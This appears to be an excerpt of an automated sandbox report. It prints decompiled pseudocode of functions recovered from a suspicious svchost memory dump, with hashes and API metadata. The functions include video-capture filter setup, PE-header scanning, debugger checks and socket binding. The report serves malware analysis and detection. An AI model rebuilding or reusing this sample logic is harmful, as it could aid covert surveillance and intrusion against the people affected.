                                                            				_t234 =  *((intOrPtr*)(_t321 + 0x30));
                                                            				if (_t234 == 0) goto 0xaf5331ea;
                                                            				if ( *((intOrPtr*)(_t234 + 0x48)) == 0) goto 0xaf5331d2;
                                                            				__imp__CoTaskMemFree();
                                                            				 *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x30)) + 0x48)) = 0;
                                                            				 *((long long*)( *((intOrPtr*)(_t321 + 0x30)) + 0x50)) = _t253;
                                                            				_t272 =  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x30)) + 0x40));
                                                            				if (_t272 == 0) goto 0xaf5331ea;
                                                            				 *((intOrPtr*)( *_t272 + 0x10))();
                                                            				 *((long long*)( *((intOrPtr*)(_t321 + 0x30)) + 0x40)) = _t253;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd0)))) + 0x18))() < 0) goto 0xaf5333dc;
                                                            				 *((long long*)(_t321 + 0x28)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) =  *((intOrPtr*)(_t321 + 0x48));
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x38))() >= 0) goto 0xaf533277;
                                                            				 *((long long*)(_t321 + 0x28)) = _t253;
                                                            				 *((long long*)(_t321 + 0x20)) =  *((intOrPtr*)(_t321 + 0x48));
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xd8)))) + 0x38))() < 0) goto 0xaf5333dc;
                                                            				_t243 =  *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38))));
                                                            				if ( *((intOrPtr*)(_t243 + 0x28))() < 0) goto 0xaf5333dc;
                                                            				_t277 =  *((intOrPtr*)(_t318 - 0x50));
                                                            				 *((intOrPtr*)(_t312 + 0x80)) =  *((intOrPtr*)(_t277 + 0x34));
                                                            				 *((intOrPtr*)(_t312 + 0x84)) =  *((intOrPtr*)(_t277 + 0x38));
                                                            				asm("movups xmm0, [ecx+0x30]");
                                                            				asm("movups [edi+0xa0], xmm0");
                                                            				asm("movups xmm1, [ecx+0x40]");
                                                            				asm("movups [edi+0xb0], xmm1");
                                                            				asm("movsd xmm0, [ecx+0x50]");
                                                            				asm("movsd [edi+0xc0], xmm0");
                                                            				 *(_t312 + 0xb4) = (( *(_t312 + 0xae) & 0x0000ffff) *  *(_t312 + 0xa4) + 0x0000001f >> 0x00000003 & 0xfffffffc) *  *(_t312 + 0xa8);
                                                            				if ( *((intOrPtr*)(_t312 + 0xf0)) == 0) goto 0xaf533304;
                                                            				E0000022B22BAF55A7E4(_t243,  *((intOrPtr*)(_t312 + 0xf0)));
                                                            				 *((long long*)(_t312 + 0xf0)) = _t253;
                                                            				E0000022B22BAF55A828(0,  *((intOrPtr*)(_t312 + 0xf0)));
                                                            				 *((long long*)(_t312 + 0xf0)) = _t243;
                                                            				if (_t243 == 0) goto 0xaf5333dc;
                                                            				 *((char*)(_t312 + 8)) = 0;
                                                            				if ( *((intOrPtr*)(_t318 - 0x58)) == 0) goto 0xaf53333b;
                                                            				__imp__CoTaskMemFree();
                                                            				 *((intOrPtr*)(_t318 - 0x58)) = 0;
                                                            				 *((long long*)(_t318 - 0x50)) = _t253;
                                                            				_t280 =  *((intOrPtr*)(_t318 - 0x60));
                                                            				if (_t280 == 0) goto 0xaf53334e;
                                                            				 *((intOrPtr*)( *_t280 + 0x10))();
                                                            				 *((long long*)(_t318 - 0x60)) = _t253;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x30))();
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x18))();
                                                            				r8d = 1;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t321 + 0x38)))) + 0x48))();
                                                            				_t284 =  *((intOrPtr*)(_t312 + 0xe8));
                                                            				if (_t284 == 0) goto 0xaf5333dc;
                                                            				if ( *((intOrPtr*)(_t312 + 0x100)) == 0) goto 0xaf5333dc;
                                                            				if ( *((intOrPtr*)( *_t284 + 0xe8))() < 0) goto 0xaf5333dc;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xe8)))) + 0x48))() < 0) goto 0xaf5333dc;
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xe8)))) + 0x98))();
                                                            				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t312 + 0xe0)))) + 0x38))();
                                                            				_t288 =  *((intOrPtr*)(_t321 + 0x48));
                                                            				if (_t288 == 0) goto 0xaf5333ec;
                                                            				 *((intOrPtr*)( *_t288 + 0x10))();
                                                            				_t289 =  *((intOrPtr*)(_t321 + 0x38));
                                                            				if (_t289 == 0) goto 0xaf5333fc;
                                                            				 *((intOrPtr*)( *_t289 + 0x10))();
                                                            				_t290 =  *((intOrPtr*)(_t321 + 0x40));
                                                            				if (_t290 == 0) goto 0xaf53340c;
                                                            				 *((intOrPtr*)( *_t290 + 0x10))();
                                                            				return E0000022B22BAF55A7C0( *(_t312 + 0xb4) + 4,  *_t288,  *(_t318 + 0x40) ^ _t321);
                                                            			}






























                                                            0x22baf532fa0
                                                            0x22baf532fa0
                                                            0x22baf532fa0
                                                            0x22baf532fa5
                                                            0x22baf532faf
                                                            0x22baf532fb4
                                                            0x22baf532fbb
                                                            0x22baf532fc5
                                                            0x22baf532fc9
                                                            0x22baf532fcc
                                                            0x22baf532fcf
                                                            0x22baf532fd6
                                                            0x22baf532fd9
                                                            0x22baf532fde
                                                            0x22baf532fe3
                                                            0x22baf532ff0
                                                            0x22baf532ff6
                                                            0x22baf533007
                                                            0x22baf533013
                                                            0x22baf53302f
                                                            0x22baf533041
                                                            0x22baf53304b
                                                            0x22baf533057
                                                            0x22baf53305e
                                                            0x22baf53305e
                                                            0x22baf533069
                                                            0x22baf53306f
                                                            0x22baf533077
                                                            0x22baf53307d
                                                            0x22baf533091
                                                            0x22baf533098
                                                            0x22baf533098
                                                            0x22baf53309e
                                                            0x22baf5330a4
                                                            0x22baf5330ae
                                                            0x22baf5330b3
                                                            0x22baf5330c4
                                                            0x22baf5330cb
                                                            0x22baf5330d0
                                                            0x22baf5330dd
                                                            0x22baf5330e6
                                                            0x22baf5330ef
                                                            0x22baf53310d
                                                            0x22baf533112
                                                            0x22baf533115
                                                            0x22baf533121
                                                            0x22baf533129
                                                            0x22baf533133
                                                            0x22baf533146
                                                            0x22baf533149
                                                            0x22baf533155
                                                            0x22baf533162
                                                            0x22baf533180
                                                            0x22baf533187
                                                            0x22baf53318b
                                                            0x22baf53318f
                                                            0x22baf5331a0
                                                            0x22baf5331a3
                                                            0x22baf5331ab
                                                            0x22baf5331b0
                                                            0x22baf5331b6
                                                            0x22baf5331c1
                                                            0x22baf5331c9
                                                            0x22baf5331d2
                                                            0x22baf5331d9
                                                            0x22baf5331de
                                                            0x22baf5331e6
                                                            0x22baf533205
                                                            0x22baf53322a
                                                            0x22baf533232
                                                            0x22baf53323d
                                                            0x22baf53325e
                                                            0x22baf533266
                                                            0x22baf533271
                                                            0x22baf533281
                                                            0x22baf533289
                                                            0x22baf53328f
                                                            0x22baf533296
                                                            0x22baf53329f
                                                            0x22baf5332a5
                                                            0x22baf5332a9
                                                            0x22baf5332b0
                                                            0x22baf5332b4
                                                            0x22baf5332bb
                                                            0x22baf5332c7
                                                            0x22baf5332ed
                                                            0x22baf5332f6
                                                            0x22baf5332f8
                                                            0x22baf5332fd
                                                            0x22baf53330d
                                                            0x22baf533312
                                                            0x22baf53331c
                                                            0x22baf533322
                                                            0x22baf533328
                                                            0x22baf53332e
                                                            0x22baf533334
                                                            0x22baf533337
                                                            0x22baf53333b
                                                            0x22baf533342
                                                            0x22baf533347
                                                            0x22baf53334a
                                                            0x22baf533358
                                                            0x22baf533365
                                                            0x22baf533371
                                                            0x22baf53337a
                                                            0x22baf53337d
                                                            0x22baf533387
                                                            0x22baf533393
                                                            0x22baf5333a0
                                                            0x22baf5333b6
                                                            0x22baf5333c4
                                                            0x22baf5333d4
                                                            0x22baf5333dc
                                                            0x22baf5333e4
                                                            0x22baf5333e9
                                                            0x22baf5333ec
                                                            0x22baf5333f4
                                                            0x22baf5333f9
                                                            0x22baf5333fc
                                                            0x22baf533404
                                                            0x22baf533409
                                                            0x22baf53343a

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeTask$CreateInstance
                                                            • String ID: Capture Filter$Grabber$vids
                                                            • API String ID: 2903366249-3946229282
                                                            • Opcode ID: febae47382ffe08a65e1b0f9a9c6461848ddf1d42ecf9496556d0baa52ec3c19
                                                            • Instruction ID: a1140f5477c5a7824c97ce6b34a1ff9b51de16111b1d738a3d0c42319f03a55d
                                                            • Opcode Fuzzy Hash: febae47382ffe08a65e1b0f9a9c6461848ddf1d42ecf9496556d0baa52ec3c19
                                                            • Instruction Fuzzy Hash: A5E12637314B85A2EB65CFAAE49829DB7B0FB88B84F049116DB4E47B25DF3AC455C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E0000022B22BAF53EBF0(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r9, void* __r10) {
                                                            				void* _t49;
                                                            				void* _t56;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				void* _t69;
                                                            				signed long long _t81;
                                                            				long long* _t83;
                                                            				intOrPtr* _t86;
                                                            				void* _t94;
                                                            				void* _t95;
                                                            				intOrPtr* _t101;
                                                            				long long _t102;
                                                            				CHAR* _t107;
                                                            				void* _t108;
                                                            				void* _t110;
                                                            				signed long long _t111;
                                                            				void* _t113;
                                                            				void* _t116;
                                                            
                                                            				_t116 = __r9;
                                                            				_t102 = __rdi;
                                                            				 *((long long*)(_t110 + 0x18)) = __rsi;
                                                            				_t108 = _t110 - 0x60;
                                                            				_t111 = _t110 - 0x160;
                                                            				_t81 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t108 + 0x58) = _t81 ^ _t111;
                                                            				_t83 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				if ( *((intOrPtr*)(_t83 + 0xd0)) <= 0) goto 0xaf53edc5;
                                                            				if ( *((intOrPtr*)(_t83 + 0xd4)) <= 0) goto 0xaf53edc5;
                                                            				 *((long long*)(_t111 + 0x170)) = __rbx;
                                                            				GetModuleHandleA(_t107);
                                                            				_t86 = _t83;
                                                            				if (_t83 == 0) goto 0xaf53edbd;
                                                            				r8d = 0x114;
                                                            				E0000022B22BAF563830(_t49, 0, _t56, _t59, _t111 + 0x20, __rdx, __rdi, _t113);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t83 == 0) goto 0xaf53edbd;
                                                            				if ( *_t83() != 0) goto 0xaf53edbd;
                                                            				if ( *_t86 != 0x5a4d) goto 0xaf53edbd;
                                                            				_t101 =  *((intOrPtr*)(_t86 + 0x3c)) + _t86;
                                                            				if ( *_t101 != 0x4550) goto 0xaf53edbd;
                                                            				r8d =  *(_t101 + 6) & 0x0000ffff;
                                                            				_t94 = _t101 + 0x18 + _t83;
                                                            				if (r8d == 0) goto 0xaf53edbd;
                                                            				if (( *(_t94 + 0x24) & 0x20000000) != 0) goto 0xaf53ece9;
                                                            				_t95 = _t94 + 0x28;
                                                            				_t69 = 1 - r8d;
                                                            				if (_t69 < 0) goto 0xaf53ecd0;
                                                            				goto 0xaf53edbd;
                                                            				r9d =  *((intOrPtr*)(_t95 + 0xc));
                                                            				if (_t69 == 0) goto 0xaf53edbd;
                                                            				if ( *((intOrPtr*)(_t95 + 0x10)) == 0) goto 0xaf53edbd;
                                                            				if ( *((intOrPtr*)(_t111 + 0x24)) != 0xa) goto 0xaf53eede;
                                                            				if ( *((intOrPtr*)(_t111 + 0x28)) != 0) goto 0xaf53edbd;
                                                            				if ( *((intOrPtr*)(_t111 + 0x2c)) - 0x3fab <= 0) goto 0xaf53ee11;
                                                            				 *((long long*)(_t111 + 0x178)) = _t102;
                                                            				 *((intOrPtr*)(_t108 + 0x40)) = 0x8d443374;
                                                            				 *((short*)(_t108 + 0x44)) = 0x943;
                                                            				_t120 =  <  ? _t108 + 0x40 : _t108 + 0x50;
                                                            				 *((intOrPtr*)(_t108 + 0x50)) = 0x8d442e74;
                                                            				 *((short*)(_t108 + 0x54)) = 0x943;
                                                            				_t58 =  <  ? 0x44 : 0x46;
                                                            				r10d = 0;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t114 =  <  ? _t108 + 0x40 : _t108 + 0x50;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if ( *((intOrPtr*)(_t95 + _t116 + _t86)) != ( *( <  ? _t108 + 0x40 : _t108 + 0x50) & 0x000000ff)) goto 0xaf53eda8;
                                                            				if (1 - 6 < 0) goto 0xaf53ed90;
                                                            				if (1 == 6) goto 0xaf53ede2;
                                                            				r10d = r10d + 1;
                                                            				if (r10d - _t101 - 6 <= 0) goto 0xaf53ed80;
                                                            				return E0000022B22BAF55A7C0(_t101 + __r10, _t108 + 0x40,  *(_t108 + 0x58) ^ _t111);
                                                            			}





















                                                            0x22baf53ebf0
                                                            0x22baf53ebf0
                                                            0x22baf53ebf0
                                                            0x22baf53ebf6
                                                            0x22baf53ebfb
                                                            0x22baf53ec02
                                                            0x22baf53ec0c
                                                            0x22baf53ec10
                                                            0x22baf53ec1e
                                                            0x22baf53ec2b
                                                            0x22baf53ec38
                                                            0x22baf53ec40
                                                            0x22baf53ec46
                                                            0x22baf53ec4c
                                                            0x22baf53ec59
                                                            0x22baf53ec5f
                                                            0x22baf53ec6e
                                                            0x22baf53ec77
                                                            0x22baf53ec86
                                                            0x22baf53ec94
                                                            0x22baf53ec9e
                                                            0x22baf53eca7
                                                            0x22baf53ecb5
                                                            0x22baf53ecba
                                                            0x22baf53ecc2
                                                            0x22baf53ecd7
                                                            0x22baf53ecd9
                                                            0x22baf53ecdf
                                                            0x22baf53ece2
                                                            0x22baf53ece4
                                                            0x22baf53ece9
                                                            0x22baf53ecf3
                                                            0x22baf53ecfb
                                                            0x22baf53ed08
                                                            0x22baf53ed13
                                                            0x22baf53ed23
                                                            0x22baf53ed2f
                                                            0x22baf53ed3b
                                                            0x22baf53ed46
                                                            0x22baf53ed4c
                                                            0x22baf53ed50
                                                            0x22baf53ed5d
                                                            0x22baf53ed70
                                                            0x22baf53ed73
                                                            0x22baf53ed76
                                                            0x22baf53ed82
                                                            0x22baf53ed85
                                                            0x22baf53ed9c
                                                            0x22baf53eda6
                                                            0x22baf53edab
                                                            0x22baf53edad
                                                            0x22baf53edb3
                                                            0x22baf53ede1

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual$AddressHandleModuleProc
                                                            • String ID: RtlGetVersion$ntdll
                                                            • API String ID: 2994196730-2582309562
                                                            • Opcode ID: 450c247e37ff96eeae48f2c88193178de83565a0597657755924ea294ff1c5a9
                                                            • Instruction ID: c077bee93350d562380f2a5f1e0ec8ac25430ac7e3cc6a8202d69ca8d05e21fe
                                                            • Opcode Fuzzy Hash: 450c247e37ff96eeae48f2c88193178de83565a0597657755924ea294ff1c5a9
                                                            • Instruction Fuzzy Hash: 6BB1D433205580EBEB7A8B6AD46C3ECB7E2F745704F588629D60A4378ADF36C949C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E0000022B22BAF56411C(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
                                                            				void* __rdi;
                                                            				void* _t36;
                                                            				int _t40;
                                                            				void* _t45;
                                                            				intOrPtr _t53;
                                                            				signed long long _t63;
                                                            				long long _t66;
                                                            				_Unknown_base(*)()* _t86;
                                                            				void* _t90;
                                                            				void* _t91;
                                                            				void* _t93;
                                                            				signed long long _t94;
                                                            				struct _EXCEPTION_POINTERS* _t100;
                                                            
                                                            				_t46 = __ecx;
                                                            				 *((long long*)(_t93 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t93 + 0x18)) = __rsi;
                                                            				_t3 = _t93 - 0x4f0; // -1288
                                                            				_t91 = _t3;
                                                            				_t94 = _t93 - 0x5f0;
                                                            				_t63 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t91 + 0x4e0) = _t63 ^ _t94;
                                                            				_t53 = r8d;
                                                            				_t45 = __ecx;
                                                            				if (__ecx == 0xffffffff) goto 0xaf56415b;
                                                            				E0000022B22BAF55B59C(_t36);
                                                            				_t5 = _t94 + 0x70; // 0x58
                                                            				r8d = 0x98;
                                                            				E0000022B22BAF563830(__ecx, 0, _t53, __esp, _t5, __rdx, _t86, __r8);
                                                            				_t6 = _t91 + 0x10; // -1272
                                                            				r8d = 0x4d0;
                                                            				E0000022B22BAF563830(_t46, 0, _t53, __esp, _t6, __rdx, _t86, __r8);
                                                            				_t7 = _t94 + 0x70; // 0x58
                                                            				 *((long long*)(_t94 + 0x48)) = _t7;
                                                            				_t10 = _t91 + 0x10; // -1272
                                                            				_t66 = _t10;
                                                            				 *((long long*)(_t94 + 0x50)) = _t66;
                                                            				__imp__RtlCaptureContext();
                                                            				r8d = 0;
                                                            				__imp__RtlLookupFunctionEntry();
                                                            				if (_t66 == 0) goto 0xaf5641ee;
                                                            				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
                                                            				_t16 = _t94 + 0x60; // 0x48
                                                            				 *((long long*)(_t94 + 0x30)) = _t16;
                                                            				_t19 = _t94 + 0x58; // 0x40
                                                            				 *((long long*)(_t94 + 0x28)) = _t19;
                                                            				_t21 = _t91 + 0x10; // -1272
                                                            				 *((long long*)(_t94 + 0x20)) = _t21;
                                                            				__imp__RtlVirtualUnwind();
                                                            				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
                                                            				_t25 = _t91 + 0x508; // 0x0
                                                            				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
                                                            				 *((long long*)(_t91 + 0xa8)) = _t25 + 8;
                                                            				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
                                                            				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
                                                            				_t40 = IsDebuggerPresent();
                                                            				SetUnhandledExceptionFilter(_t86, _t90);
                                                            				if (UnhandledExceptionFilter(_t100) != 0) goto 0xaf564250;
                                                            				if (_t40 != 0) goto 0xaf564250;
                                                            				if (_t45 == 0xffffffff) goto 0xaf564250;
                                                            				E0000022B22BAF55B59C(_t42);
                                                            				return E0000022B22BAF55A7C0(_t45,  *((intOrPtr*)(_t91 + 0x508)),  *(_t91 + 0x4e0) ^ _t94);
                                                            			}
















                                                            0x22baf56411c
                                                            0x22baf56411c
                                                            0x22baf564121
                                                            0x22baf56412a
                                                            0x22baf56412a
                                                            0x22baf564132
                                                            0x22baf564139
                                                            0x22baf564143
                                                            0x22baf56414a
                                                            0x22baf56414f
                                                            0x22baf564154
                                                            0x22baf564156
                                                            0x22baf56415d
                                                            0x22baf564162
                                                            0x22baf564168
                                                            0x22baf56416f
                                                            0x22baf564173
                                                            0x22baf564179
                                                            0x22baf56417e
                                                            0x22baf564183
                                                            0x22baf56418c
                                                            0x22baf56418c
                                                            0x22baf564190
                                                            0x22baf564195
                                                            0x22baf5641aa
                                                            0x22baf5641ad
                                                            0x22baf5641b6
                                                            0x22baf5641b8
                                                            0x22baf5641be
                                                            0x22baf5641cb
                                                            0x22baf5641d3
                                                            0x22baf5641d8
                                                            0x22baf5641dd
                                                            0x22baf5641e1
                                                            0x22baf5641e8
                                                            0x22baf5641f5
                                                            0x22baf5641fc
                                                            0x22baf564207
                                                            0x22baf56420b
                                                            0x22baf564219
                                                            0x22baf56421d
                                                            0x22baf564221
                                                            0x22baf56422b
                                                            0x22baf56423e
                                                            0x22baf564242
                                                            0x22baf564247
                                                            0x22baf56424b
                                                            0x22baf564276

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: d36c0a5996192d56c9e7224c72af95ee14e503dfbf0b640e69a524f858037cc0
                                                            • Instruction ID: 1f1056a4d946cd34fd401dfa5a0f6bacdc931b33f2b9395716fce21e0aa48c26
                                                            • Opcode Fuzzy Hash: d36c0a5996192d56c9e7224c72af95ee14e503dfbf0b640e69a524f858037cc0
                                                            • Instruction Fuzzy Hash: 15316D37214B80A6EB75CFA5E8483DE73A0F788758F540526EA9D43B9AEF39C155CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileFind$CreateFirstHandle
                                                            • String ID: q
                                                            • API String ID: 3283578348-4110462503
                                                            • Opcode ID: 222c2e3c23bc309b49d8a21100b8cfcf10d5dd40de95b5b39dc779dceeb4bac4
                                                            • Instruction ID: e6cf634174bf990b5a731adce6f8a97c55c18644a1cb86527f30077fb207bda8
                                                            • Opcode Fuzzy Hash: 222c2e3c23bc309b49d8a21100b8cfcf10d5dd40de95b5b39dc779dceeb4bac4
                                                            • Instruction Fuzzy Hash: D441B633604B80ABEA318B98F4AC79E73A4F7457A4F510319CAA9477DACF7AC451CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 26%
                                                            			E0000022B22BAF558260(void* __ecx, void* __edx, void* __eflags, void* __rcx, void* __rdx, short* __r9) {
                                                            				void* __rbx;
                                                            				intOrPtr _t18;
                                                            				signed int _t26;
                                                            				void* _t27;
                                                            				short _t32;
                                                            				signed long long _t70;
                                                            				signed long long _t71;
                                                            				signed short* _t76;
                                                            				void* _t92;
                                                            				short* _t94;
                                                            				intOrPtr* _t95;
                                                            				signed long long _t96;
                                                            				void* _t97;
                                                            				void* _t98;
                                                            				void* _t105;
                                                            
                                                            				_t98 = _t97 - 0x58;
                                                            				_t96 = _t98 + 0x20;
                                                            				_t70 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t71 = _t70 ^ _t96;
                                                            				 *(_t96 + 0x20) = _t71;
                                                            				_t105 = __rcx;
                                                            				_t95 =  *((intOrPtr*)(_t96 + 0xb0));
                                                            				_t94 = __r9;
                                                            				r15d = r8w & 0xffffffff;
                                                            				_t18 = E0000022B22BAF54FDE0(__rdx);
                                                            				 *_t95 = _t18;
                                                            				if (_t18 == 0) goto 0xaf5582c0;
                                                            				E0000022B22BAF54FED0(r15w & 0xffffffff, __rdx, __rdx, _t95);
                                                            				goto 0xaf5582c5;
                                                            				if (E0000022B22BAF54FF80(r15w & 0xffffffff, __rdx, __rdx, _t95) != 0) goto 0xaf5582d3;
                                                            				goto 0xaf558451;
                                                            				if (_t94 == 0) goto 0xaf558317;
                                                            				if ( *_t94 == 0) goto 0xaf558317;
                                                            				_t76 = _t98 - 0x20 + 0x20;
                                                            				 *_t76 = E0000022B22BAF54FDE0(_t94);
                                                            				if (E0000022B22BAF54FED0(0, _t76, _t94, _t76) != 0) goto 0xaf558317;
                                                            				__imp__#111();
                                                            				goto 0xaf558451;
                                                            				_t26 =  *_t76 & 0x0000ffff;
                                                            				_t7 = _t94 + 1; // 0x1
                                                            				r15d = _t7;
                                                            				if (_t26 == 2) goto 0xaf55837a;
                                                            				if (_t26 == 0x17) goto 0xaf55837a;
                                                            				r12d = 0;
                                                            				r8d = 6;
                                                            				__imp__#23();
                                                            				 *( *(_t96 + 0xa8)) = _t71;
                                                            				if (_t71 == 0xffffffff) goto 0xaf558447;
                                                            				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                            				if (r8d == 0) goto 0xaf55835e;
                                                            				if ( *((intOrPtr*)(__rcx + 0x38)) > 0) goto 0xaf558361;
                                                            				r15d = 0;
                                                            				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                                            				_t27 = E0000022B22BAF5503C0(_t26, r15d);
                                                            				if (_t27 != 0xffffffff) goto 0xaf55838c;
                                                            				goto 0xaf55846e;
                                                            				r12d = r15d;
                                                            				if (_t27 ==  *_t95) goto 0xaf55832f;
                                                            				goto 0xaf558451;
                                                            				if (E0000022B22BAF550450(0x273f,  *((intOrPtr*)(_t105 + 8)), _t76,  *( *(_t96 + 0xa8))) == 0xffffffff) goto 0xaf558479;
                                                            				if (( *(_t96 + 0xa0) & 0x0000ffff) != 0) goto 0xaf5583e4;
                                                            				if (r12d != 0) goto 0xaf5583c9;
                                                            				_t78 =  !=  ? 0xaf598020 : 0xaf598000;
                                                            				r8d = 0x1c;
                                                            				_t92 =  !=  ? 0xaf598020 : 0xaf598000;
                                                            				_t31 =  !=  ? r8d : 0x10;
                                                            				r8d =  !=  ? r8d : 0x10;
                                                            				goto 0xaf558438;
                                                            				if (r12d != 0) goto 0xaf5583ff;
                                                            				_t80 =  !=  ? 0xaf598020 : 0xaf598000;
                                                            				asm("movups xmm0, [ebx]");
                                                            				_t32 =  *((intOrPtr*)(( !=  ? 0xaf598020 : 0xaf598000) + 0x18));
                                                            				asm("movsd xmm1, [ebx+0x10]");
                                                            				asm("movups [ebp], xmm0");
                                                            				 *((intOrPtr*)(_t96 + 0x18)) = _t32;
                                                            				asm("movsd [ebp+0x10], xmm1");
                                                            				__imp__#9();
                                                            				 *((short*)(_t96 + 2)) = _t32;
                                                            				r8d = 0x1c;
                                                            				r8d =  ==  ? 0x10 : r8d;
                                                            				__imp__#2();
                                                            				if (0x10 != 0xffffffff) goto 0xaf55844f;
                                                            				__imp__#111();
                                                            				return E0000022B22BAF55A7C0( *(_t96 + 0xa0) & 0x0000ffff, 0xaf598020,  *(_t96 + 0x20) ^ _t96);
                                                            			}


















                                                            0x22baf55826d
                                                            0x22baf558271
                                                            0x22baf558276
                                                            0x22baf55827d
                                                            0x22baf558280
                                                            0x22baf55828b
                                                            0x22baf55828e
                                                            0x22baf558298
                                                            0x22baf55829b
                                                            0x22baf5582a2
                                                            0x22baf5582a7
                                                            0x22baf5582b7
                                                            0x22baf5582b9
                                                            0x22baf5582be
                                                            0x22baf5582c7
                                                            0x22baf5582ce
                                                            0x22baf5582da
                                                            0x22baf5582e0
                                                            0x22baf5582e9
                                                            0x22baf5582fa
                                                            0x22baf55830a
                                                            0x22baf55830c
                                                            0x22baf558312
                                                            0x22baf558317
                                                            0x22baf55831c
                                                            0x22baf55831c
                                                            0x22baf558324
                                                            0x22baf55832a
                                                            0x22baf55832c
                                                            0x22baf558332
                                                            0x22baf55833b
                                                            0x22baf558341
                                                            0x22baf558349
                                                            0x22baf55834f
                                                            0x22baf558356
                                                            0x22baf55835c
                                                            0x22baf55835e
                                                            0x22baf558361
                                                            0x22baf55836b
                                                            0x22baf558373
                                                            0x22baf558375
                                                            0x22baf55837a
                                                            0x22baf558380
                                                            0x22baf558387
                                                            0x22baf55839c
                                                            0x22baf5583ac
                                                            0x22baf5583b1
                                                            0x22baf5583c5
                                                            0x22baf5583cd
                                                            0x22baf5583d8
                                                            0x22baf5583db
                                                            0x22baf5583df
                                                            0x22baf5583e2
                                                            0x22baf5583e7
                                                            0x22baf5583fb
                                                            0x22baf5583ff
                                                            0x22baf558402
                                                            0x22baf558405
                                                            0x22baf55840a
                                                            0x22baf55840e
                                                            0x22baf558411
                                                            0x22baf558416
                                                            0x22baf558425
                                                            0x22baf558429
                                                            0x22baf558434
                                                            0x22baf55843c
                                                            0x22baf558445
                                                            0x22baf558447
                                                            0x22baf55846d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$AddressStringbindhtonssocket
                                                            • String ID:
                                                            • API String ID: 2574939132-0
                                                            • Opcode ID: 826f81d1e7b1d6e00b10998575dee52d1db3e57f385bf2414de993f519146e09
                                                            • Instruction ID: 52319d58bb12e572cde23386e43ad1092847b998ccb1cd0472d7daa7377987d4
                                                            • Opcode Fuzzy Hash: 826f81d1e7b1d6e00b10998575dee52d1db3e57f385bf2414de993f519146e09
                                                            • Instruction Fuzzy Hash: 9251D523200A44E5EB7A9FA5D80D7EC33A5F704B96F498115EE59876DAEF3AC885C301
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

